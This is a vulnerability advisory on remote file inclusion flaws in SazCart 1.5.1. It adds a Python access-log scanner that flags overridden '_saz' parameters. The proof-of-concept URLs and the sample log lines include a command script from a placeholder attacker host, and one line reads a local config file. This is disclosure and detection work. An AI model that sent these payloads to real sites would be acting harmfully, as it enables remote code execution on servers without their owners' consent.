SazCart Multiple Parameter Handling Remote File Inclusion Vulnerabilities
| Release Date: | 09/05/2008 | Severity: | Highly Critical |
| SecWatch Advisory: | SWID1021136 | Cause: | Input validation error |
| Solution Status: | Unpatched | Impact: | Disclosure of system information; Execution of arbitrary code |
| Exploit Status: | PoC Available | Access Vector: | From remote |
| Affected Software: | SazCart 1.x | | |
| References: | http://milw0rm.com/exploits/5566 | | |
| Secunia: | SA30148 | | |
| Bugtraq ID: | BID#29113 | | |
Description:
Multiple input validation vulnerabilities in SazCart have been reported, which can be exploited by remote users to disclose sensitive information and compromise a vulnerable system.
User-supplied input passed to the "_saz[settings][site_dir]" parameter in layouts/default/header.saz.php and to the "_saz[settings][site_url]" parameter in admin/alayouts/default/pages/login.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from external and local resources, such as arbitrary PHP code which will be executed by the target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.
Note: Successful exploitation requires that "register_globals" is enabled.
Affected:
SazCart version 1.5.1. Other versions may also be affected.
Proof of Concept:
Arbitrary File Inclusion:
http://[target]/layouts/default/header.saz.php?_saz[settings][site_dir]=http://[attacker]/cmd.php
http://[target]/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://[attacker]/cmd.php
Solution:
There was no vendor-supplied solution at the time of entry.
Edit source code manually to ensure user-supplied input is correctly sanitised.
Filter malicious characters and character sequences via an HTTP proxy or firewall with URL filtering capabilities.
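The URL filtering described above can be expressed as a check over request targets, shown here as an added example that is not part of the original advisory or of SazCart. It assumes access logs in common log format and treats any request-supplied "_saz[...]" key as suspicious; the function names, finding labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# With register_globals on, a request key "_saz[...]" overwrites the
# application's $_saz array, so the key itself is the indicator (assumption).
SAZ_KEY = re.compile(r"^_saz(\[|$)", re.IGNORECASE)
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # scheme://...
LOCAL = re.compile(r"\.\.[/\\]|^\s*[/\\]")           # traversal or absolute path
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line in a log entry

def fully_decode(text, rounds=3):
    """Undo repeated percent-encoding (e.g. %255B -> %5B -> [)."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_target(target):
    """Return [(parameter, finding)] for one request target (path?query)."""
    findings = []
    _, _, query = target.partition("?")
    for key, value in parse_qsl(query, keep_blank_values=True):
        key, value = fully_decode(key), fully_decode(value)
        if not SAZ_KEY.match(key):
            continue
        kind = ("remote-include" if REMOTE.search(value) else
                "local-include" if LOCAL.search(value) else "global-override")
        findings.append((key, kind))
    return findings

def scan(lines):
    """Return [(client, parameter, finding)] for access-log lines."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            hits += [(line.split()[0], k, f) for k, f in inspect_target(match.group(1))]
    return hits

# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/May/2008:10:00:01 +0000] "GET /index.php?page=cart HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/May/2008:10:00:05 +0000] "GET /layouts/default/header.saz.php?_saz[settings][site_dir]=http://attacker.example/cmd.php HTTP/1.1" 200 312',
    '192.0.2.44 - - [09/May/2008:10:00:09 +0000] "GET /admin/alayouts/default/pages/login.php?_saz%5Bsettings%5D%5Bsite_url%5D=..%2F..%2Fconfig.inc HTTP/1.1" 200 98',
    '198.51.100.7 - - [09/May/2008:10:01:30 +0000] "GET /layouts/default/header.saz.php?_saz%255Bsettings%255D%255Bsite_dir%255D=http%253A%252F%252Fattacker.example%252Fcmd.php HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same `inspect_target` check can back a blocking rule in a proxy: reject any request for which it returns a non-empty list.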
Credits:
RoMaNcYxHaCkEr